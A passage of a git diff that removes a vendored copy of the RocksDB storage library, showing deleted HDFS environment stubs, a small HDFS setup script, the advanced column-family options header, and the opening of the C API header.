-  virtual Status GetFileSize(const std::string& fname,
-                             uint64_t* size) override {
-    return notsup;
-  }
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* time) override {
-    return notsup;
-  }
-
-  virtual Status RenameFile(const std::string& src,
-                            const std::string& target) override {
-    return notsup;
-  }
-
-  virtual Status LinkFile(const std::string& src,
-                          const std::string& target) override {
-    return notsup;
-  }
-
-  virtual Status LockFile(const std::string& fname, FileLock** lock) override {
-    return notsup;
-  }
-
-  virtual Status UnlockFile(FileLock* lock) override { return notsup; }
-
-  virtual Status NewLogger(const std::string& fname,
-                           shared_ptr<Logger>* result) override {
-    return notsup;
-  }
-
-  virtual void Schedule(void (*function)(void* arg), void* arg,
-                        Priority pri = LOW, void* tag = nullptr,
-                        void (*unschedFunction)(void* arg) = 0) override {}
-
-  virtual int UnSchedule(void* tag, Priority pri) override { return 0; }
-
-  virtual void StartThread(void (*function)(void* arg), void* arg) override {}
-
-  virtual void WaitForJoin() override {}
-
-  virtual unsigned int GetThreadPoolQueueLen(
-      Priority pri = LOW) const override {
-    return 0;
-  }
-
-  virtual Status GetTestDirectory(std::string* path) override { return notsup; }
-
-  virtual uint64_t NowMicros() override { return 0; }
-
-  virtual void SleepForMicroseconds(int micros) override {}
-
-  virtual Status GetHostName(char* name, uint64_t len) override {
-    return notsup;
-  }
-
-  virtual Status GetCurrentTime(int64_t* unix_time) override { return notsup; }
-
-  virtual Status GetAbsolutePath(const std::string& db_path,
-                                 std::string* outputpath) override {
-    return notsup;
-  }
-
-  virtual void SetBackgroundThreads(int number, Priority pri = LOW) override {}
-  virtual int GetBackgroundThreads(Priority pri = LOW) override { return 0; }
-  virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) override {
-  }
-  virtual std::string TimeToString(uint64_t number) override { return ""; }
-
-  virtual uint64_t GetThreadID() const override {
-    return 0;
-  }
-};
-}
-
-#endif // USE_HDFS
diff --git a/thirdparty/rocksdb/hdfs/setup.sh b/thirdparty/rocksdb/hdfs/setup.sh
deleted file mode 100644
index ac69b52..0000000
--- a/thirdparty/rocksdb/hdfs/setup.sh
+++ /dev/null
@@ -1,7 +0,0 @@
-export USE_HDFS=1
-export LD_LIBRARY_PATH=$JAVA_HOME/jre/lib/amd64/server:$JAVA_HOME/jre/lib/amd64:/usr/lib/hadoop/lib/native
-
-export CLASSPATH=
-for f in `find /usr/lib/hadoop-hdfs | grep jar`; do export CLASSPATH=$CLASSPATH:$f; done
-for f in `find /usr/lib/hadoop | grep jar`; do export CLASSPATH=$CLASSPATH:$f; done
-for f in `find /usr/lib/hadoop/client | grep jar`; do export CLASSPATH=$CLASSPATH:$f; done
diff --git a/thirdparty/rocksdb/include/rocksdb/advanced_options.h b/thirdparty/rocksdb/include/rocksdb/advanced_options.h
deleted file mode 100644
index 6f45134..0000000
--- a/thirdparty/rocksdb/include/rocksdb/advanced_options.h
+++ /dev/null
@@ -1,578 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <memory>
-
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/universal_compaction.h"
-
-namespace rocksdb {
-
-class Slice;
-class SliceTransform;
-enum CompressionType : unsigned char;
-class TablePropertiesCollectorFactory;
-class TableFactory;
-struct Options;
-
-enum CompactionStyle : char {
-  // level based compaction style
-  kCompactionStyleLevel = 0x0,
-  // Universal compaction style
-  // Not supported in ROCKSDB_LITE.
-  kCompactionStyleUniversal = 0x1,
-  // FIFO compaction style
-  // Not supported in ROCKSDB_LITE
-  kCompactionStyleFIFO = 0x2,
-  // Disable background compaction. Compaction jobs are submitted
-  // via CompactFiles().
-  // Not supported in ROCKSDB_LITE
-  kCompactionStyleNone = 0x3,
-};
-
-// In Level-based compaction, it Determines which file from a level to be
-// picked to merge to the next level. We suggest people try
-// kMinOverlappingRatio first when you tune your database.
-enum CompactionPri : char {
-  // Slightly prioritize larger files by size compensated by #deletes
-  kByCompensatedSize = 0x0,
-  // First compact files whose data's latest update time is oldest.
-  // Try this if you only update some hot keys in small ranges.
-  kOldestLargestSeqFirst = 0x1,
-  // First compact files whose range hasn't been compacted to the next level
-  // for the longest. If your updates are random across the key space,
-  // write amplification is slightly better with this option.
-  kOldestSmallestSeqFirst = 0x2,
-  // First compact files whose ratio between overlapping size in next level
-  // and its size is the smallest. It in many cases can optimize write
-  // amplification.
-  kMinOverlappingRatio = 0x3,
-};
-
-struct CompactionOptionsFIFO {
-  // once the total sum of table files reaches this, we will delete the oldest
-  // table file
-  // Default: 1GB
-  uint64_t max_table_files_size;
-
-  // Drop files older than TTL. TTL based deletion will take precedence over
-  // size based deletion if ttl > 0.
-  // delete if sst_file_creation_time < (current_time - ttl)
-  // unit: seconds. Ex: 1 day = 1 * 24 * 60 * 60
-  // Default: 0 (disabled)
-  uint64_t ttl = 0;
-
-  // If true, try to do compaction to compact smaller files into larger ones.
-  // Minimum files to compact follows options.level0_file_num_compaction_trigger
-  // and compaction won't trigger if average compact bytes per del file is
-  // larger than options.write_buffer_size. This is to protect large files
-  // from being compacted again.
-  // Default: false;
-  bool allow_compaction = false;
-
-  CompactionOptionsFIFO() : max_table_files_size(1 * 1024 * 1024 * 1024) {}
-  CompactionOptionsFIFO(uint64_t _max_table_files_size, bool _allow_compaction,
-                        uint64_t _ttl = 0)
-      : max_table_files_size(_max_table_files_size),
-        ttl(_ttl),
-        allow_compaction(_allow_compaction) {}
-};
-
-// Compression options for different compression algorithms like Zlib
-struct CompressionOptions {
-  int window_bits;
-  int level;
-  int strategy;
-  // Maximum size of dictionary used to prime the compression library. Currently
-  // this dictionary will be constructed by sampling the first output file in a
-  // subcompaction when the target level is bottommost. This dictionary will be
-  // loaded into the compression library before compressing/uncompressing each
-  // data block of subsequent files in the subcompaction. Effectively, this
-  // improves compression ratios when there are repetitions across data blocks.
-  // A value of 0 indicates the feature is disabled.
-  // Default: 0.
-  uint32_t max_dict_bytes;
-
-  CompressionOptions()
-      : window_bits(-14), level(-1), strategy(0), max_dict_bytes(0) {}
-  CompressionOptions(int wbits, int _lev, int _strategy, int _max_dict_bytes)
-      : window_bits(wbits),
-        level(_lev),
-        strategy(_strategy),
-        max_dict_bytes(_max_dict_bytes) {}
-};
-
-enum UpdateStatus {    // Return status For inplace update callback
-  UPDATE_FAILED   = 0, // Nothing to update
-  UPDATED_INPLACE = 1, // Value updated inplace
-  UPDATED         = 2, // No inplace update. Merged value set
-};
-
-
-struct AdvancedColumnFamilyOptions {
-  // The maximum number of write buffers that are built up in memory.
-  // The default and the minimum number is 2, so that when 1 write buffer
-  // is being flushed to storage, new writes can continue to the other
-  // write buffer.
-  // If max_write_buffer_number > 3, writing will be slowed down to
-  // options.delayed_write_rate if we are writing to the last write buffer
-  // allowed.
-  //
-  // Default: 2
-  //
-  // Dynamically changeable through SetOptions() API
-  int max_write_buffer_number = 2;
-
-  // The minimum number of write buffers that will be merged together
-  // before writing to storage.  If set to 1, then
-  // all write buffers are flushed to L0 as individual files and this increases
-  // read amplification because a get request has to check in all of these
-  // files. Also, an in-memory merge may result in writing lesser
-  // data to storage if there are duplicate records in each of these
-  // individual write buffers.  Default: 1
-  int min_write_buffer_number_to_merge = 1;
-
-  // The total maximum number of write buffers to maintain in memory including
-  // copies of buffers that have already been flushed.  Unlike
-  // max_write_buffer_number, this parameter does not affect flushing.
-  // This controls the minimum amount of write history that will be available
-  // in memory for conflict checking when Transactions are used.
-  //
-  // When using an OptimisticTransactionDB:
-  // If this value is too low, some transactions may fail at commit time due
-  // to not being able to determine whether there were any write conflicts.
-  //
-  // When using a TransactionDB:
-  // If Transaction::SetSnapshot is used, TransactionDB will read either
-  // in-memory write buffers or SST files to do write-conflict checking.
-  // Increasing this value can reduce the number of reads to SST files
-  // done for conflict detection.
-  //
-  // Setting this value to 0 will cause write buffers to be freed immediately
-  // after they are flushed.
-  // If this value is set to -1, 'max_write_buffer_number' will be used.
-  //
-  // Default:
-  // If using a TransactionDB/OptimisticTransactionDB, the default value will
-  // be set to the value of 'max_write_buffer_number' if it is not explicitly
-  // set by the user.  Otherwise, the default is 0.
-  int max_write_buffer_number_to_maintain = 0;
-
-  // Allows thread-safe inplace updates. If this is true, there is no way to
-  // achieve point-in-time consistency using snapshot or iterator (assuming
-  // concurrent updates). Hence iterator and multi-get will return results
-  // which are not consistent as of any point-in-time.
-  // If inplace_callback function is not set,
-  //   Put(key, new_value) will update inplace the existing_value iff
-  //   * key exists in current memtable
-  //   * new sizeof(new_value) <= sizeof(existing_value)
-  //   * existing_value for that key is a put i.e. kTypeValue
-  // If inplace_callback function is set, check doc for inplace_callback.
-  // Default: false.
-  bool inplace_update_support = false;
-
-  // Number of locks used for inplace update
-  // Default: 10000, if inplace_update_support = true, else 0.
-  //
-  // Dynamically changeable through SetOptions() API
-  size_t inplace_update_num_locks = 10000;
-
-  // existing_value - pointer to previous value (from both memtable and sst).
-  //                  nullptr if key doesn't exist
-  // existing_value_size - pointer to size of existing_value).
-  //                       nullptr if key doesn't exist
-  // delta_value - Delta value to be merged with the existing_value.
-  //               Stored in transaction logs.
-  // merged_value - Set when delta is applied on the previous value.
-
-  // Applicable only when inplace_update_support is true,
-  // this callback function is called at the time of updating the memtable
-  // as part of a Put operation, lets say Put(key, delta_value). It allows the
-  // 'delta_value' specified as part of the Put operation to be merged with
-  // an 'existing_value' of the key in the database.
-
-  // If the merged value is smaller in size that the 'existing_value',
-  // then this function can update the 'existing_value' buffer inplace and
-  // the corresponding 'existing_value'_size pointer, if it wishes to.
-  // The callback should return UpdateStatus::UPDATED_INPLACE.
-  // In this case. (In this case, the snapshot-semantics of the rocksdb
-  // Iterator is not atomic anymore).
-
-  // If the merged value is larger in size than the 'existing_value' or the
-  // application does not wish to modify the 'existing_value' buffer inplace,
-  // then the merged value should be returned via *merge_value. It is set by
-  // merging the 'existing_value' and the Put 'delta_value'. The callback should
-  // return UpdateStatus::UPDATED in this case. This merged value will be added
-  // to the memtable.
-
-  // If merging fails or the application does not wish to take any action,
-  // then the callback should return UpdateStatus::UPDATE_FAILED.
-
-  // Please remember that the original call from the application is Put(key,
-  // delta_value). So the transaction log (if enabled) will still contain (key,
-  // delta_value). The 'merged_value' is not stored in the transaction log.
-  // Hence the inplace_callback function should be consistent across db reopens.
-
-  // Default: nullptr
-  UpdateStatus (*inplace_callback)(char* existing_value,
-                                   uint32_t* existing_value_size,
-                                   Slice delta_value,
-                                   std::string* merged_value) = nullptr;
-
-  // if prefix_extractor is set and memtable_prefix_bloom_size_ratio is not 0,
-  // create prefix bloom for memtable with the size of
-  // write_buffer_size * memtable_prefix_bloom_size_ratio.
-  // If it is larger than 0.25, it is santinized to 0.25.
-  //
-  // Default: 0 (disable)
-  //
-  // Dynamically changeable through SetOptions() API
-  double memtable_prefix_bloom_size_ratio = 0.0;
-
-  // Page size for huge page for the arena used by the memtable. If <=0, it
-  // won't allocate from huge page but from malloc.
-  // Users are responsible to reserve huge pages for it to be allocated. For
-  // example:
-  //      sysctl -w vm.nr_hugepages=20
-  // See linux doc Documentation/vm/hugetlbpage.txt
-  // If there isn't enough free huge page available, it will fall back to
-  // malloc.
-  //
-  // Dynamically changeable through SetOptions() API
-  size_t memtable_huge_page_size = 0;
-
-  // If non-nullptr, memtable will use the specified function to extract
-  // prefixes for keys, and for each prefix maintain a hint of insert location
-  // to reduce CPU usage for inserting keys with the prefix. Keys out of
-  // domain of the prefix extractor will be insert without using hints.
-  //
-  // Currently only the default skiplist based memtable implements the feature.
-  // All other memtable implementation will ignore the option. It incurs ~250
-  // additional bytes of memory overhead to store a hint for each prefix.
-  // Also concurrent writes (when allow_concurrent_memtable_write is true) will
-  // ignore the option.
-  //
-  // The option is best suited for workloads where keys will likely to insert
-  // to a location close the last inserted key with the same prefix.
-  // One example could be inserting keys of the form (prefix + timestamp),
-  // and keys of the same prefix always comes in with time order. Another
-  // example would be updating the same key over and over again, in which case
-  // the prefix can be the key itself.
-  //
-  // Default: nullptr (disable)
-  std::shared_ptr<const SliceTransform>
-      memtable_insert_with_hint_prefix_extractor = nullptr;
-
-  // Control locality of bloom filter probes to improve cache miss rate.
-  // This option only applies to memtable prefix bloom and plaintable
-  // prefix bloom. It essentially limits every bloom checking to one cache line.
-  // This optimization is turned off when set to 0, and positive number to turn
-  // it on.
-  // Default: 0
-  uint32_t bloom_locality = 0;
-
-  // size of one block in arena memory allocation.
-  // If <= 0, a proper value is automatically calculated (usually 1/8 of
-  // writer_buffer_size, rounded up to a multiple of 4KB).
-  //
-  // There are two additional restriction of the specified size:
-  // (1) size should be in the range of [4096, 2 << 30] and
-  // (2) be the multiple of the CPU word (which helps with the memory
-  // alignment).
-  //
-  // We'll automatically check and adjust the size number to make sure it
-  // conforms to the restrictions.
-  //
-  // Default: 0
-  //
-  // Dynamically changeable through SetOptions() API
-  size_t arena_block_size = 0;
-
-  // Different levels can have different compression policies. There
-  // are cases where most lower levels would like to use quick compression
-  // algorithms while the higher levels (which have more data) use
-  // compression algorithms that have better compression but could
-  // be slower. This array, if non-empty, should have an entry for
-  // each level of the database; these override the value specified in
-  // the previous field 'compression'.
-  //
-  // NOTICE if level_compaction_dynamic_level_bytes=true,
-  // compression_per_level[0] still determines L0, but other elements
-  // of the array are based on base level (the level L0 files are merged
-  // to), and may not match the level users see from info log for metadata.
-  // If L0 files are merged to level-n, then, for i>0, compression_per_level[i]
-  // determines compaction type for level n+i-1.
-  // For example, if we have three 5 levels, and we determine to merge L0
-  // data to L4 (which means L1..L3 will be empty), then the new files go to
-  // L4 uses compression type compression_per_level[1].
-  // If now L0 is merged to L2. Data goes to L2 will be compressed
-  // according to compression_per_level[1], L3 using compression_per_level[2]
-  // and L4 using compression_per_level[3]. Compaction for each level can
-  // change when data grows.
-  std::vector<CompressionType> compression_per_level;
-
-  // Number of levels for this database
-  int num_levels = 7;
-
-  // Soft limit on number of level-0 files. We start slowing down writes at this
-  // point. A value <0 means that no writing slow down will be triggered by
-  // number of files in level-0.
-  //
-  // Default: 20
-  //
-  // Dynamically changeable through SetOptions() API
-  int level0_slowdown_writes_trigger = 20;
-
-  // Maximum number of level-0 files.  We stop writes at this point.
-  //
-  // Default: 36
-  //
-  // Dynamically changeable through SetOptions() API
-  int level0_stop_writes_trigger = 36;
-
-  // Target file size for compaction.
-  // target_file_size_base is per-file size for level-1.
-  // Target file size for level L can be calculated by
-  // target_file_size_base * (target_file_size_multiplier ^ (L-1))
-  // For example, if target_file_size_base is 2MB and
-  // target_file_size_multiplier is 10, then each file on level-1 will
-  // be 2MB, and each file on level 2 will be 20MB,
-  // and each file on level-3 will be 200MB.
-  //
-  // Default: 64MB.
-  //
-  // Dynamically changeable through SetOptions() API
-  uint64_t target_file_size_base = 64 * 1048576;
-
-  // By default target_file_size_multiplier is 1, which means
-  // by default files in different levels will have similar size.
-  //
-  // Dynamically changeable through SetOptions() API
-  int target_file_size_multiplier = 1;
-
-  // If true, RocksDB will pick target size of each level dynamically.
-  // We will pick a base level b >= 1. L0 will be directly merged into level b,
-  // instead of always into level 1. Level 1 to b-1 need to be empty.
-  // We try to pick b and its target size so that
-  // 1. target size is in the range of
-  //   (max_bytes_for_level_base / max_bytes_for_level_multiplier,
-  //    max_bytes_for_level_base]
-  // 2. target size of the last level (level num_levels-1) equals to extra size
-  //    of the level.
-  // At the same time max_bytes_for_level_multiplier and
-  // max_bytes_for_level_multiplier_additional are still satisfied.
-  //
-  // With this option on, from an empty DB, we make last level the base level,
-  // which means merging L0 data into the last level, until it exceeds
-  // max_bytes_for_level_base. And then we make the second last level to be
-  // base level, to start to merge L0 data to second last level, with its
-  // target size to be 1/max_bytes_for_level_multiplier of the last level's
-  // extra size. After the data accumulates more so that we need to move the
-  // base level to the third last one, and so on.
-  //
-  // For example, assume max_bytes_for_level_multiplier=10, num_levels=6,
-  // and max_bytes_for_level_base=10MB.
-  // Target sizes of level 1 to 5 starts with:
-  // [- - - - 10MB]
-  // with base level is level. Target sizes of level 1 to 4 are not applicable
-  // because they will not be used.
-  // Until the size of Level 5 grows to more than 10MB, say 11MB, we make
-  // base target to level 4 and now the targets looks like:
-  // [- - - 1.1MB 11MB]
-  // While data are accumulated, size targets are tuned based on actual data
-  // of level 5. When level 5 has 50MB of data, the target is like:
-  // [- - - 5MB 50MB]
-  // Until level 5's actual size is more than 100MB, say 101MB. Now if we keep
-  // level 4 to be the base level, its target size needs to be 10.1MB, which
-  // doesn't satisfy the target size range. So now we make level 3 the target
-  // size and the target sizes of the levels look like:
-  // [- - 1.01MB 10.1MB 101MB]
-  // In the same way, while level 5 further grows, all levels' targets grow,
-  // like
-  // [- - 5MB 50MB 500MB]
-  // Until level 5 exceeds 1000MB and becomes 1001MB, we make level 2 the
-  // base level and make levels' target sizes like this:
-  // [- 1.001MB 10.01MB 100.1MB 1001MB]
-  // and go on...
-  //
-  // By doing it, we give max_bytes_for_level_multiplier a priority against
-  // max_bytes_for_level_base, for a more predictable LSM tree shape. It is
-  // useful to limit worse case space amplification.
-  //
-  // max_bytes_for_level_multiplier_additional is ignored with this flag on.
-  //
-  // Turning this feature on or off for an existing DB can cause unexpected
-  // LSM tree structure so it's not recommended.
-  //
-  // NOTE: this option is experimental
-  //
-  // Default: false
-  bool level_compaction_dynamic_level_bytes = false;
-
-  // Default: 10.
-  //
-  // Dynamically changeable through SetOptions() API
-  double max_bytes_for_level_multiplier = 10;
-
-  // Different max-size multipliers for different levels.
-  // These are multiplied by max_bytes_for_level_multiplier to arrive
-  // at the max-size of each level.
-  //
-  // Default: 1
-  //
-  // Dynamically changeable through SetOptions() API
-  std::vector<int> max_bytes_for_level_multiplier_additional =
-      std::vector<int>(num_levels, 1);
-
-  // We try to limit number of bytes in one compaction to be lower than this
-  // threshold. But it's not guaranteed.
-  // Value 0 will be sanitized.
-  //
-  // Default: result.target_file_size_base * 25
-  uint64_t max_compaction_bytes = 0;
-
-  // All writes will be slowed down to at least delayed_write_rate if estimated
-  // bytes needed to be compaction exceed this threshold.
-  //
-  // Default: 64GB
-  uint64_t soft_pending_compaction_bytes_limit = 64 * 1073741824ull;
-
-  // All writes are stopped if estimated bytes needed to be compaction exceed
-  // this threshold.
-  //
-  // Default: 256GB
-  uint64_t hard_pending_compaction_bytes_limit = 256 * 1073741824ull;
-
-  // The compaction style. Default: kCompactionStyleLevel
-  CompactionStyle compaction_style = kCompactionStyleLevel;
-
-  // If level compaction_style = kCompactionStyleLevel, for each level,
-  // which files are prioritized to be picked to compact.
-  // Default: kByCompensatedSize
-  CompactionPri compaction_pri = kByCompensatedSize;
-
-  // The options needed to support Universal Style compactions
-  CompactionOptionsUniversal compaction_options_universal;
-
-  // The options for FIFO compaction style
-  CompactionOptionsFIFO compaction_options_fifo;
-
-  // An iteration->Next() sequentially skips over keys with the same
-  // user-key unless this option is set. This number specifies the number
-  // of keys (with the same userkey) that will be sequentially
-  // skipped before a reseek is issued.
-  //
-  // Default: 8
-  //
-  // Dynamically changeable through SetOptions() API
-  uint64_t max_sequential_skip_in_iterations = 8;
-
-  // This is a factory that provides MemTableRep objects.
-  // Default: a factory that provides a skip-list-based implementation of
-  // MemTableRep.
-  std::shared_ptr<MemTableRepFactory> memtable_factory =
-      std::shared_ptr<SkipListFactory>(new SkipListFactory);
-
-  // Block-based table related options are moved to BlockBasedTableOptions.
-  // Related options that were originally here but now moved include:
-  //   no_block_cache
-  //   block_cache
-  //   block_cache_compressed
-  //   block_size
-  //   block_size_deviation
-  //   block_restart_interval
-  //   filter_policy
-  //   whole_key_filtering
-  // If you'd like to customize some of these options, you will need to
-  // use NewBlockBasedTableFactory() to construct a new table factory.
-
-  // This option allows user to collect their own interested statistics of
-  // the tables.
-  // Default: empty vector -- no user-defined statistics collection will be
-  // performed.
-  typedef std::vector<std::shared_ptr<TablePropertiesCollectorFactory>>
-      TablePropertiesCollectorFactories;
-  TablePropertiesCollectorFactories table_properties_collector_factories;
-
-  // Maximum number of successive merge operations on a key in the memtable.
-  //
-  // When a merge operation is added to the memtable and the maximum number of
-  // successive merges is reached, the value of the key will be calculated and
-  // inserted into the memtable instead of the merge operation. This will
-  // ensure that there are never more than max_successive_merges merge
-  // operations in the memtable.
-  //
-  // Default: 0 (disabled)
-  //
-  // Dynamically changeable through SetOptions() API
-  size_t max_successive_merges = 0;
-
-  // This flag specifies that the implementation should optimize the filters
-  // mainly for cases where keys are found rather than also optimize for keys
-  // missed. This would be used in cases where the application knows that
-  // there are very few misses or the performance in the case of misses is not
-  // important.
-  //
-  // For now, this flag allows us to not store filters for the last level i.e
-  // the largest level which contains data of the LSM store. For keys which
-  // are hits, the filters in this level are not useful because we will search
-  // for the data anyway. NOTE: the filters in other levels are still useful
-  // even for key hit because they tell us whether to look in that level or go
-  // to the higher level.
-  //
-  // Default: false
-  bool optimize_filters_for_hits = false;
-
-  // After writing every SST file, reopen it and read all the keys.
-  // Default: false
-  bool paranoid_file_checks = false;
-
-  // In debug mode, RocksDB run consistency checks on the LSM everytime the LSM
-  // change (Flush, Compaction, AddFile). These checks are disabled in release
-  // mode, use this option to enable them in release mode as well.
-  // Default: false
-  bool force_consistency_checks = false;
-
-  // Measure IO stats in compactions and flushes, if true.
-  // Default: false
-  bool report_bg_io_stats = false;
-
-  // Create ColumnFamilyOptions with default values for all fields
-  AdvancedColumnFamilyOptions();
-  // Create ColumnFamilyOptions from Options
-  explicit AdvancedColumnFamilyOptions(const Options& options);
-
-  // ---------------- OPTIONS NOT SUPPORTED ANYMORE ----------------
-
-  // NOT SUPPORTED ANYMORE
-  // This does not do anything anymore.
-  int max_mem_compaction_level;
-
-  // NOT SUPPORTED ANYMORE -- this options is no longer used
-  // Puts are delayed to options.delayed_write_rate when any level has a
-  // compaction score that exceeds soft_rate_limit. This is ignored when == 0.0.
-  //
-  // Default: 0 (disabled)
-  //
-  // Dynamically changeable through SetOptions() API
-  double soft_rate_limit = 0.0;
-
-  // NOT SUPPORTED ANYMORE -- this options is no longer used
-  double hard_rate_limit = 0.0;
-
-  // NOT SUPPORTED ANYMORE -- this options is no longer used
-  unsigned int rate_limit_delay_max_milliseconds = 100;
-
-  // NOT SUPPORTED ANYMORE
-  // Does not have any effect.
-  bool purge_redundant_kvs_while_flush = true;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/c.h b/thirdparty/rocksdb/include/rocksdb/c.h
deleted file mode 100644
index 2269f72..0000000
--- a/thirdparty/rocksdb/include/rocksdb/c.h
+++ /dev/null
@@ -1,1475 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/* Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-  Use of this source code is governed by a BSD-style license that can be
-  found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-  C bindings for rocksdb.  May be useful as a stable ABI that can be
-  used by programs that keep rocksdb in a shared library, or for
-  a JNI api.
-
-  Does not support:
-  . getters for the option types
-  . custom comparators that implement key shortening
-  . capturing post-write-snapshot
-  . custom iter, db, env, cache implementations using just the C bindings
-
-  Some conventions:
-
-  (1) We expose just opaque struct pointers and functions to clients.
-  This allows us to change internal representations without having to
-  recompile clients.
-
-  (2) For simplicity, there is no equivalent to the Slice type.  Instead,
-  the caller has to pass the pointer and length as separate
-  arguments.
-
-  (3) Errors are represented by a null-terminated c string.  NULL
-  means no error.  All operations that can raise an error are passed
-  a "char** errptr" as the last argument.  One of the following must
-  be true on entry:
-     *errptr == NULL
-     *errptr points to a malloc()ed null-terminated error message
-  On success, a leveldb routine leaves *errptr unchanged.
-  On failure, leveldb frees the old value of *errptr and
-  set *errptr to a malloc()ed error message.
-
-  (4) Bools have the type unsigned char (0 == false; rest == true)
-
-  (5) All of the pointer arguments must be non-NULL.
-*/
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_C_H_
-#define STORAGE_ROCKSDB_INCLUDE_C_H_
-
-#pragma once
-
-#ifdef _WIN32
-#ifdef ROCKSDB_DLL
-#ifdef ROCKSDB_LIBRARY_EXPORTS
-#define ROCKSDB_LIBRARY_API __declspec(dllexport)
-#else
-#define ROCKSDB_LIBRARY_API __declspec(dllimport)
-#endif
-#else
-#define ROCKSDB_LIBRARY_API
-#endif
-#else
-#define ROCKSDB_LIBRARY_API
-#endif
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#include <stdarg.h>
-#include <stddef.h>
-#include <stdint.h>
-
-/* Exported types */
-
-typedef struct rocksdb_t                 rocksdb_t;
-typedef struct rocksdb_backup_engine_t   rocksdb_backup_engine_t;
-typedef struct rocksdb_backup_engine_info_t   rocksdb_backup_engine_info_t;
-typedef struct rocksdb_restore_options_t rocksdb_restore_options_t;
-typedef struct rocksdb_cache_t           rocksdb_cache_t;
-typedef struct rocksdb_compactionfilter_t rocksdb_compactionfilter_t;
-typedef struct rocksdb_compactionfiltercontext_t
-    rocksdb_compactionfiltercontext_t;
-typedef struct rocksdb_compactionfilterfactory_t
-    rocksdb_compactionfilterfactory_t;
-typedef struct rocksdb_comparator_t      rocksdb_comparator_t;
-typedef struct rocksdb_dbpath_t          rocksdb_dbpath_t;
-typedef struct rocksdb_env_t             rocksdb_env_t;
-typedef struct rocksdb_fifo_compaction_options_t rocksdb_fifo_compaction_options_t;
-typedef struct rocksdb_filelock_t        rocksdb_filelock_t;
-typedef struct rocksdb_filterpolicy_t    rocksdb_filterpolicy_t;
-typedef struct rocksdb_flushoptions_t    rocksdb_flushoptions_t;
-typedef struct rocksdb_iterator_t        rocksdb_iterator_t;
-typedef struct rocksdb_logger_t          rocksdb_logger_t;
-typedef struct rocksdb_mergeoperator_t   rocksdb_mergeoperator_t;
-typedef struct rocksdb_options_t         rocksdb_options_t;
-typedef struct rocksdb_compactoptions_t rocksdb_compactoptions_t;
-typedef struct rocksdb_block_based_table_options_t
-    rocksdb_block_based_table_options_t;
-typedef struct rocksdb_cuckoo_table_options_t
-    rocksdb_cuckoo_table_options_t;
-typedef struct rocksdb_randomfile_t      rocksdb_randomfile_t;
-typedef struct rocksdb_readoptions_t     rocksdb_readoptions_t;
-typedef struct rocksdb_seqfile_t         rocksdb_seqfile_t;
-typedef struct rocksdb_slicetransform_t  rocksdb_slicetransform_t;
-typedef struct rocksdb_snapshot_t        rocksdb_snapshot_t;
-typedef struct rocksdb_writablefile_t    rocksdb_writablefile_t;
-typedef struct rocksdb_writebatch_t      rocksdb_writebatch_t;
-typedef struct rocksdb_writebatch_wi_t   rocksdb_writebatch_wi_t;
-typedef struct rocksdb_writeoptions_t    rocksdb_writeoptions_t;
-typedef struct rocksdb_universal_compaction_options_t rocksdb_universal_compaction_options_t;
-typedef struct rocksdb_livefiles_t     rocksdb_livefiles_t;
-typedef struct rocksdb_column_family_handle_t rocksdb_column_family_handle_t;
-typedef struct rocksdb_envoptions_t      rocksdb_envoptions_t;
-typedef struct rocksdb_ingestexternalfileoptions_t rocksdb_ingestexternalfileoptions_t;
-typedef struct rocksdb_sstfilewriter_t   rocksdb_sstfilewriter_t;
-typedef struct rocksdb_ratelimiter_t     rocksdb_ratelimiter_t;
-typedef struct rocksdb_pinnableslice_t rocksdb_pinnableslice_t;
-typedef struct rocksdb_transactiondb_options_t rocksdb_transactiondb_options_t;
-typedef struct rocksdb_transactiondb_t rocksdb_transactiondb_t;
-typedef struct rocksdb_transaction_options_t rocksdb_transaction_options_t;
-typedef struct rocksdb_optimistictransactiondb_t rocksdb_optimistictransactiondb_t;
-typedef struct rocksdb_optimistictransaction_options_t rocksdb_optimistictransaction_options_t;
-typedef struct rocksdb_transaction_t rocksdb_transaction_t;
-typedef struct rocksdb_checkpoint_t rocksdb_checkpoint_t;
-
-/* DB operations */
-
-extern ROCKSDB_LIBRARY_API rocksdb_t* rocksdb_open(
-    const rocksdb_options_t* options, const char* name, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_t* rocksdb_open_for_read_only(
-    const rocksdb_options_t* options, const char* name,
-    unsigned char error_if_log_file_exist, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_backup_engine_t* rocksdb_backup_engine_open(
-    const rocksdb_options_t* options, const char* path, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_backup_engine_create_new_backup(
-    rocksdb_backup_engine_t* be, rocksdb_t* db, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_backup_engine_purge_old_backups(
-    rocksdb_backup_engine_t* be, uint32_t num_backups_to_keep, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_restore_options_t*
-rocksdb_restore_options_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_restore_options_destroy(
-    rocksdb_restore_options_t* opt);
-extern ROCKSDB_LIBRARY_API void rocksdb_restore_options_set_keep_log_files(
-    rocksdb_restore_options_t* opt, int v);
-
-extern ROCKSDB_LIBRARY_API void
-rocksdb_backup_engine_restore_db_from_latest_backup(
-    rocksdb_backup_engine_t* be, const char* db_dir, const char* wal_dir,
-    const rocksdb_restore_options_t* restore_options, char** errptr);
-
-extern ROCKSDB_LIBRARY_API const rocksdb_backup_engine_info_t*
-rocksdb_backup_engine_get_backup_info(rocksdb_backup_engine_t* be);
-
-extern ROCKSDB_LIBRARY_API int rocksdb_backup_engine_info_count(
-    const rocksdb_backup_engine_info_t* info);
-
